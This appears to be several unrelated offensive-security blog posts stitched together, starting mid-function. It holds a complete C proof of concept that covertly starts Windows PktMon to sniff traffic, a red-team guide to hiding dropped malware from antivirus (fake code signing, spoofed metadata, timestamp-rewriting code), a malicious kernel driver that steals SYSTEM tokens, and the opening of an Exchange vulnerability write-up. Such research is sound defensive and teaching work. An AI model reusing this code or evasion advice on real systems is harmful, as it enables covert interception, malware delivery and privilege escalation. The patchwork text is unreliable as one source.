hManager = OpenSCManagerA(NULL, "ServicesActive", SC_MANAGER_CONNECT); // SC_MANAGER_CONNECT == 0x01
if (!hManager) {
return NULL;
}
hService = OpenServiceA(hManager, "PktMon", SERVICE_START | SERVICE_STOP); // 0x10 | 0x20 == 0x30
CloseServiceHandle(hManager);
if (!hService) {
return NULL;
}
status = StartServiceA(hService, 0, NULL); // result ignored on purpose: the service may already be running
CloseServiceHandle(hService);
hDriver = CreateFileA("\\\\.\\PktMonDev", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // 0x80000000 | 0x40000000 == 0xC0000000; OPEN_EXISTING == 0x03; FILE_ATTRIBUTE_NORMAL == 0x80
if (hDriver == INVALID_HANDLE_VALUE) {
return NULL;
}
return hDriver;
}
//...
In our PoC we are going to create a filter to intercept the traffic through port 14099 (yeah we love 1337 jokes) and then start capturing the traffic:
//...
DWORD initiateCapture(HANDLE hDriver) {
BOOL status;
DWORD IOCTL_start = 0x220404;
DWORD IOCTL_filter = 0x220410;
LPVOID IOCTL_start_InBuffer = NULL;
DWORD IOCTL_start_bytesReturned = 0;
char IOCTL_start_message[0x14] = { 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00 };
LPVOID IOCTL_filter_InBuffer = NULL;
DWORD IOCTL_filter_bytesReturned = 0;
char IOCTL_filter_message[0xD8] = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
IOCTL_filter_InBuffer = (LPVOID)malloc(0xD8);
memcpy(IOCTL_filter_InBuffer, IOCTL_filter_message, 0xD8);
status = DeviceIoControl(hDriver, IOCTL_filter, IOCTL_filter_InBuffer, 0xD8, NULL, 0, &IOCTL_filter_bytesReturned, NULL);
if (!status) {
printf("[!] Error! Filter creation failed!\n");
return -1;
}
IOCTL_start_InBuffer = (LPVOID)malloc(0x14);
memcpy(IOCTL_start_InBuffer, IOCTL_start_message, 0x14);
status = DeviceIoControl(hDriver, IOCTL_start, IOCTL_start_InBuffer, 0x14, NULL, 0, &IOCTL_start_bytesReturned, NULL);
if (status) {
return 0;
}
return -1;
}
//...
All the parts are created, we only need to glue them together :).
Keep in mind that in this PoC we did not clean up anything!! For that you need to add code that:
- Disables the provider and stops the trace session (EVENT_CONTROL_CODE_DISABLE_PROVIDER and EVENT_TRACE_CONTROL_STOP)
After this warning, here is the shitty PoC:
/* Shabby PktMon (PoC) by Juan Manuel Fernandez (@TheXC3LL) */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h> // malloc
#include <evntrace.h>
#include <strsafe.h>
#define LOGFILE_PATH "C:\\Windows\\System32\\ShabbySniffer.etl"
#define LOGSESSION_NAME "My Shabby Sniffer doing things"
HANDLE PktMonServiceStart(void) {
SC_HANDLE hManager;
SC_HANDLE hService;
HANDLE hDriver;
BOOL status;
hManager = OpenSCManagerA(NULL, "ServicesActive", SC_MANAGER_CONNECT); // SC_MANAGER_CONNECT == 0x01
if (!hManager) {
return NULL;
}
hService = OpenServiceA(hManager, "PktMon", SERVICE_START | SERVICE_STOP); // 0x10 | 0x20 == 0x30
CloseServiceHandle(hManager);
if (!hService) {
return NULL;
}
status = StartServiceA(hService, 0, NULL); // result ignored on purpose: the service may already be running
CloseServiceHandle(hService);
hDriver = CreateFileA("\\\\.\\PktMonDev", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // 0x80000000 | 0x40000000 == 0xC0000000; OPEN_EXISTING == 0x03; FILE_ATTRIBUTE_NORMAL == 0x80
if (hDriver == INVALID_HANDLE_VALUE) {
return NULL;
}
return hDriver;
}
DWORD initiateCapture(HANDLE hDriver) {
BOOL status;
DWORD IOCTL_start = 0x220404;
DWORD IOCTL_filter = 0x220410;
LPVOID IOCTL_start_InBuffer = NULL;
DWORD IOCTL_start_bytesReturned = 0;
char IOCTL_start_message[0x14] = { 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00 };
LPVOID IOCTL_filter_InBuffer = NULL;
DWORD IOCTL_filter_bytesReturned = 0;
char IOCTL_filter_message[0xD8] = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
IOCTL_filter_InBuffer = (LPVOID)malloc(0xD8);
memcpy(IOCTL_filter_InBuffer, IOCTL_filter_message, 0xD8);
status = DeviceIoControl(hDriver, IOCTL_filter, IOCTL_filter_InBuffer, 0xD8, NULL, 0, &IOCTL_filter_bytesReturned, NULL);
if (!status) {
printf("[!] Error! Filter creation failed!\n");
return -1;
}
IOCTL_start_InBuffer = (LPVOID)malloc(0x14);
memcpy(IOCTL_start_InBuffer, IOCTL_start_message, 0x14);
status = DeviceIoControl(hDriver, IOCTL_start, IOCTL_start_InBuffer, 0x14, NULL, 0, &IOCTL_start_bytesReturned, NULL);
if (status) {
return 0;
}
return -1;
}
DWORD initiateTrace(void) {
static const GUID sessionGuid = { 0x6f0aaf43, 0xec9e, 0xa946, {0x9e, 0x7f, 0xf9, 0xf4, 0x13, 0x37, 0x13, 0x37 } };
static const GUID providerGuid = { 0x4d4f80d9, 0xc8bd, 0x4d73, {0xbb, 0x5b, 0x19, 0xc9, 0x04, 0x02, 0xc5, 0xac } }; // {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}
// Taken from https://docs.microsoft.com/en-us/windows/win32/etw/example-that-creates-a-session-and-enables-a-manifest-based-provider
ULONG status = ERROR_SUCCESS;
TRACEHANDLE sessionHandle = 0;
PEVENT_TRACE_PROPERTIES pSessionProperties = NULL;
ULONG bufferSize = 0;
BOOL TraceOn = TRUE;
bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) + sizeof(LOGSESSION_NAME);
pSessionProperties = (PEVENT_TRACE_PROPERTIES)malloc(bufferSize);
ZeroMemory(pSessionProperties, bufferSize);
pSessionProperties->Wnode.BufferSize = bufferSize;
pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution
pSessionProperties->Wnode.Guid = sessionGuid;
pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR;
pSessionProperties->MaximumFileSize = 50; // 50 MB
pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
pSessionProperties->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME);
StringCbCopyA(((LPSTR)pSessionProperties + pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH);
status = StartTraceA(&sessionHandle, LOGSESSION_NAME, pSessionProperties);
if (status != ERROR_SUCCESS) {
printf("[!] StartTraceA failed!\n");
return -1;
}
status = EnableTraceEx2(sessionHandle, &providerGuid, EVENT_CONTROL_CODE_ENABLE_PROVIDER, TRACE_LEVEL_INFORMATION, 0, 0, 0, NULL);
if (status != ERROR_SUCCESS) {
printf("[!] EnableTraceEx2 failed!\n");
return -1;
}
return 0;
}
int main(int argc, char** argv) {
HANDLE hDriver;
printf("\t\t-=[ Shabby PktMon by @TheXC3LL ]=-\n\n");
printf("[*] Starting PktMon service...\n");
hDriver = PktMonServiceStart();
if (hDriver == NULL) {
printf("\t[!] Error! Service PktMon could not be started!\n\n");
return -1;
}
printf("\t[+] SERVICE STARTED SUCCESSFULLY! (Handle: %p)\n", hDriver);
printf("[*] Initiating Event Tracer...\n");
if (initiateTrace() == -1) {
printf("\t[!] Error! Could not start the event tracer!\n");
return -1;
}
printf("\t[+] EVENT TRACER STARTED SUCCESSFULLY!\n");
printf("[*] Adding a filter and initializing capture...\n");
if (initiateCapture(hDriver) == -1) {
printf("\t[!] Error! Could not start capturing!\n");
return -1;
}
printf("\n[+] CAPTURE INITIATED SUCCESSFULLY!\n");
return 0;
}
We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.
During red team operations and penetration tests, there are occasions where you need to drop an executable to disk. It’s usually best to stay in memory and avoid this if possible, but there are plenty of situations where it’s unavoidable, like DLL sideloading. In these cases, you typically drop a custom malicious PE file of some sort. Being on disk instead of in memory opens you up to the world of AV static analysis and the set of challenges bypassing it presents. There are many resources on the net about avoiding AV signatures, say for example Metasploit shellcode, by using string obfuscation, encryption, XORs, pulling down staged payloads over the network, shrinking the import table, polymorphic encoding, etc. I’m going to assume you’ve done your due diligence and handled the big stuff. However there are some other more subtle indicators and heuristics AV can use to help spot a malicious binary when it is present on disk. These are what this post is all about.
When you compile a binary, whether it’s a DLL or an EXE, the compiler will automatically include a certain amount of metadata about the resulting binary, such as the compilation date and time, compiler vendor, debug files, file paths, etc. This “data about data” can reveal a lot about an executable, especially an executable never encountered by a given AV engine.
The AV engine’s job is to take files, inspect the metadata, apply heuristics, and determine the likelihood of it being malicious. Clearly the more metadata and information we leave in our dropped binary, the more likely it is to be flagged. We are automatically at a disadvantage, since we are writing custom code that has never been seen by the AV engine and its file hash is unfamiliar. Compare that to a very commonly-seen file, like a Firefox installer MSI with a known hash and metadata, seen by many installations of the AV software across customer locations, and you can see how a custom compiled binary can stick out.
All is not lost, however. AV can’t simply declare every newly-seen file malicious, as all known-good files start off as unknown at some point. So the AV must use imperfect signatures, metadata, and heuristics to make a good vs. bad determination. We want to remove as many pieces of information that could push us towards a positive detection as we can.
Now will making these changes make your malicious payload FUD and guaranteed to slip through? Not at all. If you’re dropping unencrypted Cobalt Strike shellcode all over the place, you’re done. But as AV and EDR get better, the more important it is to give them as little information as possible. And who wants to burn a perfectly crafted custom payload because you left some silly string in? It’s not a magic bullet, it’s not even an ordinary unmagical bullet, but every little bit helps.
One way developers can help signal to Windows and AV engines that their software is not malicious is by using code signing certs. These are (supposed to be) expensive and difficult to obtain x.509 certificates that can be used to cryptographically sign a compiled binary. The idea is that only the legitimate and properly vetted owner should have access to the private key, and must have legitimately signed the file, indicating that it is trustworthy. This gives AV a high fidelity way of identifying the author.
There are two problems with this approach though. The first is that certificates get stolen or leaked: Stuxnet famously used multiple stolen, valid code signing certs to sign its payloads and help avoid detection, and certificate private keys occasionally end up committed to GitHub as well. So a valid signature is never a 100% guarantee of non-maliciousness.
The other issue is that sometimes AV engines fail to check the validity of a certificate at all, instead simply checking to see if the file has been signed. This means that as long as we can sign our payload with any old self-signed cert, we would pass this particular check. Lucky for us, anyone can generate a code signing cert and use it to sign their malware. It’s free and easy to automate. This Stack Overflow post shows how to create one on Windows and how to use signtool to sign a binary. On Linux, you can use Limelighter to sign with an existing certificate, or download the cert from a website and use it as a code signing cert:
And the resulting self-signed binary:
CarbonCopy is another good tool that can use website certificates to sign a file.
Another piece of data, or rather lack of data, is the file properties of an executable. By default, this information is not included when you compile a binary. It looks like this:
It must be added via a resource file and compiled into the binary. This missing information is another, somewhat low fidelity, indicator that a file may not have been produced by a legitimate software vendor, and is therefore more likely to be malicious. Admittedly, this is probably not a huge red flag to most AV, but it’s easy enough to implement, so why not? The details add up.
Creating the resource file is not the most straightforward process. I found the easiest way was to let Visual Studio create it for me. You create a new item of the type resource, and then add a Version resource. Tweak it how you’d like, and then save the resulting Resource.rc file. I’ve created one and stripped out the extraneous lines for easy use here.
Here are two gists for creating the object file to include with your compilation sources: Windows and Linux. Thanks to Sektor7 for the Windows version.
Here is the result of including a resource file during compilation:
The Rich header is an undocumented field within the PE header of Windows executables that were created by a Microsoft compiler. It captures some information about the compilation process, including the compiler and linker versions, number of files compiled, objects created, etc. It has been covered in some depth in several places, but a good recap and analysis is here.
Because this header encodes rather specific information about an executable, it provides a way of tracking it between systems. AV engines can use it to match up strains of malware, support attribution, etc. Some threat actors are aware of this fact however, and try to use it to their advantage. The most well-known case of this was the OlympicDestroyer malware, which spoofed its Rich header to resemble the Lazarus group.
I don’t have code or specific recommendations here, mainly because what you might want to do with the Rich header will depend on what you want to achieve. It is worth knowing about, because it is an indicator that you can use, or have used against you. For instance, the GCC compiler doesn’t include the Rich header. If the environment you’re operating in is dominated by Windows machines, much of the software running was likely compiled by Visual Studio. Running a GCC or MinGW compiled binary isn’t enough on its own to get you caught, but it may make you stand out, which can often mean the same thing. So you may want to add a Rich header, or remove it, or change it to emulate an adversary, or do nothing at all with it. Just know that it exists, and be aware of what it might tell the opposition about your file. Knowledge is power after all.
If you would like to at least remove the Rich header, peupdate can handle that for you. Another option would be one of the PE parsing Python libraries.
Here is a breakdown of the Rich header, courtesy of the wonderful PE-bear. Note the references to masm and the Visual Studio version used.
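For anyone who wants to inspect the Rich header without a GUI, here is a rough sketch of how it can be located in a PE image already loaded into memory. It relies on the commonly described layout: the block sits between the DOS header and the PE header, ends with the plaintext marker "Rich" followed by a 32-bit XOR key, and begins with the marker "DanS" XORed with that key. The function names are hypothetical, and the sketch assumes the block is 4-byte aligned, which is typical but not guaranteed.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read a 32-bit little-endian value from a byte buffer. */
static uint32_t read_u32le(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Locate the Rich header in a PE image held in memory.
   On success returns 1 and sets *start (offset of the XORed "DanS" marker),
   *end (offset just past the key that follows "Rich") and *key (the XOR key).
   Returns 0 if no Rich header is found. */
int find_rich_header(const uint8_t *pe, size_t len,
                     size_t *start, size_t *end, uint32_t *key) {
    if (len < 0x40 || pe[0] != 'M' || pe[1] != 'Z') return 0;
    uint32_t e_lfanew = read_u32le(pe + 0x3C); /* offset of the PE header */
    if (e_lfanew > len) return 0;
    for (size_t off = 0x40; off + 8 <= e_lfanew; off += 4) {
        if (memcmp(pe + off, "Rich", 4) != 0) continue;
        uint32_t k = read_u32le(pe + off + 4);
        /* Walk forward from the end of the DOS header looking for "DanS" ^ key. */
        for (size_t s = 0x40; s < off; s += 4) {
            if ((read_u32le(pe + s) ^ k) == 0x536E6144u) { /* "DanS" */
                *start = s;
                *end = off + 8;
                *key = k;
                return 1;
            }
        }
    }
    return 0;
}
```

The entries between start and end are pairs of 32-bit values XORed with the same key, which is what tools like PE-bear decode into compiler and build identifiers.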
Another indicator AV can use to help determine maliciousness in a file is the compilation time. The idea is that most software will have been compiled some time in the past before it is used. A very recently compiled binary, say within the past day or even hour, could look very suspicious, especially running on Bob in HR’s machine, who probably isn’t doing any programming. Even a signed binary with no other obvious signs of being malicious, depending on the compile time, can look mighty strange. As always, context matters. If by chance you’ve breached the development network, new binaries are business as usual.
One complication with timestamps in a PE file is the sheer number of them. This post puts the number at 8, though some are not always included, or are simply for managing bound imports and are not full timestamps. A tool is included for viewing them, and tools like PEStudio are great for this as well. Two commonly modified timestamps are the TimeDateStamp of the COFF File Header, and the TimeDateStamp field of the debug directory:
Like the Rich header, timestamps are not something that must be changed. They are just another piece of information to be aware of, something that can tell the blue team a story. You get to decide what story is appropriate, depending on the context of the engagement.
For an excellent deep dive into timestamps, I recommend this blog post.
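As a concrete illustration of the first of those two fields, the sketch below reads and overwrites the TimeDateStamp of the COFF File Header in a PE image held in memory. The field sits 8 bytes past the start of the PE signature (4 bytes of "PE\0\0", then the 2-byte Machine and 2-byte NumberOfSections fields). Function names are made up for this example, and the debug directory timestamp and the PE checksum are deliberately left alone.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Find the file offset of IMAGE_FILE_HEADER.TimeDateStamp. Returns 1 on success. */
int coff_timestamp_offset(const uint8_t *pe, size_t len, size_t *off) {
    if (len < 0x40 || pe[0] != 'M' || pe[1] != 'Z') return 0;
    uint32_t e_lfanew = (uint32_t)pe[0x3C] | ((uint32_t)pe[0x3D] << 8) |
                        ((uint32_t)pe[0x3E] << 16) | ((uint32_t)pe[0x3F] << 24);
    if (e_lfanew > len - 12) return 0;                     /* need signature + 8 bytes */
    if (memcmp(pe + e_lfanew, "PE\0\0", 4) != 0) return 0; /* not a PE image */
    *off = (size_t)e_lfanew + 8;
    return 1;
}

/* Read the COFF timestamp (seconds since the Unix epoch). Returns 1 on success. */
int get_coff_timestamp(const uint8_t *pe, size_t len, uint32_t *ts) {
    size_t off;
    if (!coff_timestamp_offset(pe, len, &off)) return 0;
    *ts = (uint32_t)pe[off] | ((uint32_t)pe[off + 1] << 8) |
          ((uint32_t)pe[off + 2] << 16) | ((uint32_t)pe[off + 3] << 24);
    return 1;
}

/* Overwrite the COFF timestamp in place. Returns 1 on success. */
int set_coff_timestamp(uint8_t *pe, size_t len, uint32_t ts) {
    size_t off;
    if (!coff_timestamp_offset(pe, len, &off)) return 0;
    for (int i = 0; i < 4; i++) pe[off + i] = (uint8_t)(ts >> (8 * i));
    return 1;
}
```

Changing only this one field leaves the other timestamps inconsistent with it, which is itself a detail an analyst may notice.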
The main theme of this post has been about knowing the little details of the malware you write, and the context in which you deploy that malware. Context matters, details add up, and they can make or break an engagement. I hope this list of subtleties will come in handy on your next engagement.
I’ve recently been working on expanding my knowledge of Windows kernel concepts and kernel mode programming. In the process, I wrote a malicious driver that could steal the token of one process and assign it to another. This article by the prolific and ever-informative spotless forms the basis of this post. In that article he walks through the structure of the _EPROCESS and _TOKEN kernel mode structures, and how to manipulate them to change the access token of a given process, all via WinDbg. It’s a great post and I highly recommend reading it before continuing on here.
The difference in this post is that I use C++ to write a Windows kernel mode driver from scratch and a user mode program that communicates with that driver. This program passes in two process IDs, one to steal the token from, and another to assign the stolen token to. All the code for this post is available here.
A common method of escalating privileges via buggy drivers or kernel mode exploits is to steal the access token of a SYSTEM process and assign it to a process of your choosing. However this is commonly done with shellcode that is executed by the exploit. Some examples of this can be found in the wonderful HackSys Extreme Vulnerable Driver project. My goal was to learn more about drivers and kernel programming rather than just pure exploitation, so I chose to implement the same concept in C++ via a malicious driver.
Every process has a primary access token, which is a kernel data structure that describes the rights and privileges that a process has. Tokens have been covered in detail by Microsoft and from an offensive perspective, so I won’t spend a lot of time on them here. However it is important to know how the access token structure is associated with each process.
_EPROCESS Structure
Each process is represented in the kernel by an _EPROCESS structure, and these structures are chained together in a doubly linked list. This structure is not fully documented by Microsoft, but the ReactOS project as usual has a good definition of it. One of the members of this structure is called, unsurprisingly, Token. Technically this member is of type _EX_FAST_REF, but for our purposes, this is just an implementation detail. This Token member contains a pointer to the token object belonging to that particular process. An image of this member within the _EPROCESS structure in WinDbg can be seen below:
As you can see, the Token member is located at a fixed offset from the beginning of the _EPROCESS structure. This offset seems to change between versions of Windows, and on my test machine running Windows 10 20H2, it is 0x4b8.
Given the above information, the method for stealing a token and assigning it is simple. Find the _EPROCESS structure of the process we want to steal from, go to the Token member offset, save the address that it is pointing to, and copy it to the corresponding Token member of the process we want to elevate privileges with. This is the same process that Spotless performed in WinDbg.
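The offset arithmetic can be illustrated outside the kernel. The sketch below is not driver code: it uses plain byte buffers as stand-ins for two _EPROCESS structures and copies the pointer-sized Token slot from one to the other. The 0x4b8 offset is the Windows 10 20H2 value mentioned above; the buffer size and function names are arbitrary choices for the example. The masking helper reflects that on x64 the low 4 bits of an _EX_FAST_REF value hold a reference count rather than address bits.

```c
#include <stdint.h>
#include <string.h>

#define TOKEN_OFFSET       0x4b8  /* Token member offset on Windows 10 20H2; varies by build */
#define FAKE_EPROCESS_SIZE 0x1000 /* arbitrary size for the stand-in buffers (assumption) */

/* Read the raw _EX_FAST_REF value stored in the Token slot. */
uint64_t read_token_slot(const uint8_t *eprocess) {
    uint64_t value;
    memcpy(&value, eprocess + TOKEN_OFFSET, sizeof value);
    return value;
}

/* Strip the reference-count bits to get the token object address (x64). */
uint64_t token_object_address(uint64_t fast_ref) {
    return fast_ref & ~0xFULL;
}

/* Overwrite the target's Token slot with the source's Token slot. */
void copy_token_slot(uint8_t *target_eprocess, const uint8_t *source_eprocess) {
    memcpy(target_eprocess + TOKEN_OFFSET,
           source_eprocess + TOKEN_OFFSET,
           sizeof(uint64_t));
}
```

After copy_token_slot(target, source) both buffers hold the same value at offset 0x4b8, which mirrors the identical token addresses one would expect to see in the debugger after a real copy.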
In lieu of exploiting a kernel mode vulnerability, I wrote a simple test driver. The driver exposes an IOCTL that can be called from user mode. It takes a struct that contains two members: an unsigned long for the PID of the process to steal a token from, and an unsigned long for the PID of the process to elevate.
The driver will find the _EPROCESS structure for each PID, locate the Token members, and copy the source process token to the target process.
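To make the shape of that interface concrete, here is a hedged sketch of what the shared request struct and IOCTL value could look like. Everything named here is hypothetical: the field names, the function number 0x800 and the macro names are placeholders rather than the values used in the actual driver, and uint32_t stands in for the 32-bit unsigned long of Windows so the snippet compiles anywhere. The macro reproduces the standard CTL_CODE bit layout by hand.

```c
#include <stdint.h>

/* Hand-rolled equivalent of the CTL_CODE bit layout: device type, access, function, method. */
#define MAKE_CTL_CODE(dev, func, method, access)                    \
    (((uint32_t)(dev) << 16) | ((uint32_t)(access) << 14) |         \
     ((uint32_t)(func) << 2) | (uint32_t)(method))

#define SKETCH_DEVICE_UNKNOWN  0x22u /* value of FILE_DEVICE_UNKNOWN */
#define SKETCH_METHOD_BUFFERED 0u    /* value of METHOD_BUFFERED */
#define SKETCH_ANY_ACCESS      0u    /* value of FILE_ANY_ACCESS */

/* Hypothetical IOCTL: function number 0x800 is a placeholder, not the driver's real value. */
#define IOCTL_STEAL_TOKEN_SKETCH \
    MAKE_CTL_CODE(SKETCH_DEVICE_UNKNOWN, 0x800u, SKETCH_METHOD_BUFFERED, SKETCH_ANY_ACCESS)

/* Input buffer passed from user mode to the driver. */
typedef struct {
    uint32_t source_pid; /* process to steal the token from */
    uint32_t target_pid; /* process to elevate */
} steal_token_request;

/* Build a request for the given pair of PIDs. */
steal_token_request make_steal_token_request(uint32_t source_pid, uint32_t target_pid) {
    steal_token_request req;
    req.source_pid = source_pid;
    req.target_pid = target_pid;
    return req;
}
```

In a real client this struct would be the input buffer handed to DeviceIoControl, with its size passed as the input length.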
The user mode program is a simple C++ CLI application that takes two PIDs as arguments, and copies the token of the first PID to the second PID, via the exposed driver IOCTL. This is done by first opening a handle to the driver by name with CreateFileW and then calling DeviceIoControl with the correct IOCTL.
The code for the token copying is pretty straightforward. In the main function for handling IOCTLs, HandleDeviceIoControl, we switch on the received IOCTL. When we receive IOCTL_STEAL_TOKEN, we save the user mode buffer, extract the two PIDs, and attempt to resolve the PID of the target process to the address of its _EPROCESS structure:
Once we have the _EPROCESS address, we can use the offset of 0x4b8 to find the Token member address:
We repeat the process once more for the PID of the process to steal a token from, and now we have all the information we need. The last step is to copy the source token to the target process, like so:
Here is a visual breakdown of the entire flow. First we create a command prompt and verify who we are:
Next we use the user mode program to pass the two PIDs to the driver. The first PID, 4, belongs to the System process, which almost always has PID 4. We see that the driver was accessed and the PIDs passed to it successfully:
In the debug output view, we can see that HandleDeviceIoControl is called with the IOCTL_STEAL_TOKEN IOCTL, the PIDs are processed, and the target token overwritten. Highlighted are the identical addresses of the two tokens after the copy, indicating that we have successfully assigned the token:
Finally we run whoami again, and see that we are now SYSTEM!
We can even do the same thing with another user’s token:
Kernel mode is fun! If you’re on the offensive side of the house, it’s well worth digging into. After all, every user mode road leads to kernel space; knowing your way around can only make you a better operator, and it expands the attack surface available to you. Blue can benefit just as much, since knowing what you’re defending at a deep level will make you able to defend it more effectively. To dig deeper I highly recommend Pavel Yosifovich’s Windows Kernel Programming, the HackSys Extreme Vulnerable Driver, and of course the Windows Internals books.
The series of A New Attack Surface on MS Exchange:
Microsoft Exchange, as one of the most common email solutions in the world, has become part of the daily operation and security connection for governments and enterprises. This January, we reported a series of Exchange Server vulnerabilities to Microsoft and named it ProxyLogon. ProxyLogon might be the most severe and impactful vulnerability in Exchange history. If you were paying attention to the industry news, you must have heard of it.
While looking into ProxyLogon at the architectural level, we found it is not just a vulnerability, but a totally new attack surface that no one has mentioned before. This attack surface could lead hackers or security researchers to more vulnerabilities. Therefore, we decided to focus on this attack surface and eventually found at least 8 vulnerabilities. These vulnerabilities span server-side, client-side, and even crypto bugs. We chained these vulnerabilities into 3 attacks:
I would like to highlight that all vulnerabilities we unveiled here are logic bugs, which means they could be reproduced and exploited more easily than any memory corruption bugs. We have presented our research at Black Hat USA and DEFCON, and won the Best Server-Side bug of Pwnie Awards 2021. You can check our presentation materials here:
By understanding the basics of this new attack surface, you won’t be surprised why we can pop out 0days easily!
I would like to state that all the vulnerabilities mentioned have been reported via the responsible vulnerability disclosure process and patched by Microsoft. You could find more detail of the CVEs and the report timeline from the following table.
Report Time | Name | CVE | Patch Time | CAS[1] | Reported By |
---|---|---|---|---|---|
Jan 05, 2021 | ProxyLogon | CVE-2021-26855 | Mar 02, 2021 | Yes | Orange Tsai, Volexity and MSTIC |
Jan 05, 2021 | ProxyLogon | CVE-2021-27065 | Mar 02, 2021 | - | Orange Tsai, Volexity and MSTIC |
Jan 17, 2021 | ProxyOracle | CVE-2021-31196 | Jul 13, 2021 | Yes | Orange Tsai |
Jan 17, 2021 | ProxyOracle | CVE-2021-31195 | May 11, 2021 | - | Orange Tsai |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34473 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-34523 | Apr 13, 2021 | Yes | Orange Tsai working with ZDI |
Apr 02, 2021 | ProxyShell[2] | CVE-2021-31207 | May 11, 2021 | - | Orange Tsai working with ZDI |
Jun 02, 2021 | - | - | - | Yes | Orange Tsai |
